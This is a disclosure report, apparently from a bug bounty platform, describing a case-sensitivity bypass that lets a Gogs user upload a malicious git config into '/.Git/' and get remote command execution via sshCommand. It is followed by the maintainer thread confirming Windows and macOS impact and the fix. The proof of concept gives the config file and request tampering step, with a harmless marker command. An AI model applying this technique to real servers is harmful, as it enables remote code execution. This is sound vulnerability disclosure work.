Bypass to Remote Command Execution in uploading repository file in gogs/gogs

Valid

Reported on

Jun 6th 2022

Description

I find a bypass for CVE-2022-0415 and previous fixs. In the fix of CVE-2022-0415, gogs filter /.git/ by strings.HasSuffix and strings.Contains. However, use /.Git/ can bypass this and upload successfully

Proof of Concept

Create a repository in Gogs, upload a file config to the repository on the web page:

[core]
    repositoryformatversion = 0
    filemode = true
    bare = false
    logallrefupdates = true
    ignorecase = true
    precomposeunicode = true
    sshCommand = echo pwnned > /tmp/poc
[remote "origin"]
    url = git@github.com:torvalds/linux.git
    fetch = +refs/heads/*:refs/remotes/origin/*
[branch "master"]
    remote = origin
    merge = refs/heads/master

Intercept the HTTP POST form submitting request, and set parameter to tree_path=/.Git/ in request body. Then a file with text pwnned is created in /tmp/poc.

video

host in a github repo https://github.com/cokeBeer/test with name gogsbypass.mov

Impact

This vulnerability is capable of executing commands on the remote server and gain the privileged user account, which leads sensitive data exposure, identity theft, etc.

We are processing your report and will contact the gogs team within 24 hours. a year ago
cokebeer modified the report
a year ago
cokebeer modified the report
a year ago
We have contacted a member of the gogs team and are waiting to hear back a year ago
gogs/gogs maintainer has acknowledged this report a year ago
Joe Chen
a year ago

Maintainer

Thanks for the report!

Could you confirm what systems are affected?

cokebeer
a year ago

Researcher

I tested in the latest version of gogs docker images , so linux are affected.

Joe Chen
a year ago

Maintainer

Can you record a video for the poc on Linux systems? We weren't able to reproduce it on Linux.

Joe Chen
a year ago

Maintainer

Though can confirm Windows and macOS are affected because path case-insensitive.

cokebeer modified the report
a year ago
cokebeer modified the report
a year ago
cokebeer
a year ago

Researcher

Add video file link in the report, download to play it. I think this way is faster then uploading to video website which always need check.

cokebeer modified the report
a year ago
Joe Chen
a year ago

Maintainer

Thanks for the video!

We're still not able to reproduce it on Linux, where .Git directory is simply treated as a regular content directory. In the poc video, there is also no evidence showing the /tmp/poc is created during the recording of video.

Could you record a video starting from a fresh installation of a fresh pull of gogs/gogs?

cokebeer
a year ago

Researcher

Seems problem doesn't come from the way I operate. the docker's data dir is mounted on my MacOS system and may share the case insensitive feature.

cokebeer
a year ago

Researcher

So just exclude Linux. By the way, I found some bugs claimed to be fixed in gogs's changelog but actually exist in latest version. How can I get in contact without messing the comment of this report?

Joe Chen
a year ago

Maintainer

Sounds good, marking as valid.

To file bug reports, please go https://github.com/gogs/gogs/issues/new/choose

Joe Chen validated this vulnerability a year ago
cokebeer has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
We have sent a fix follow up to the gogs team. We will try again in 7 days. a year ago
We have sent a second fix follow up to the gogs team. We will try again in 10 days. a year ago
We have sent a third and final fix follow up to the gogs team. This report is now considered stale. a year ago
Joe Chen marked this as fixed in 0.12.11 with commit 15d0d6 9 months ago
Joe Chen has been awarded the fix bounty
This vulnerability has been assigned a CVE
Joe Chen published this vulnerability 9 months ago
to join this conversation